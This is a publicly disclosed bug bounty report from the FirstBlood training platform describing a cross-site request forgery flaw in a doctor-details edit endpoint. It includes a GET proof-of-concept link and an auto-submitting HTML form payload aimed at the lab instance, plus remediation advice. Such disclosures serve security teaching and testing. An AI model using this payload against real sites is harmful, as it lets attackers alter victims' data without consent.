Edit doctor details with CSRF

FirstBlood-#1383 — Edit doctor details with CSRF
This issue was discovered on FirstBlood v3

This report has been reviewed and accepted as a valid vulnerability on FirstBlood!

On 2022-12-09, pichik Level 4 reported:


Hi,

I found that request which edits doctor details is vulnerable to CSRF. 
DESCRIPTION
I am not sure if these are two separated bugs or just one, as you can do this with POST and GET request.
Here are edit doctor requests without csrf token:

POST:



GET:

 
POC:
Link for GET request:
https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php?drid=1&name=PWND&bio=PWND&bookable=1
CSRF Payload: 
<html>
<form id="1" action="https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php" method="post" enctype="application/x-www-form-urlencoded">
<input name='name' value='PWND' type='hidden'>
<input name='drid' value='1' type='hidden'>
<input name='bio' value='PWND' type='hidden'>
<input name='bookable' value='1' type='hidden'>
</form> 
<script>
document.getElementById("1").submit()
</script>
</html>
This is working only in firefox, as Chrome is not sending cookies.

(I guess its because SameSite flag in Cookie is blank, but not sure) 
Impact
Attacker can edit doctor details or insert XSS payload which I reported before. 
REMEDIATION
Request contains csrf token, but this token do nothing.

Forbiding changes with GET requests and implementation CSRF token in server side should fix this issue.

This report has been publicly disclosed for everyone to view

P4 Low

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: csrf

Payload: -

FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but to an over sight this cookie was overwritten rendering it useless.

BugBountyHunter

DESCRIPTION

POC:

Impact

REMEDIATION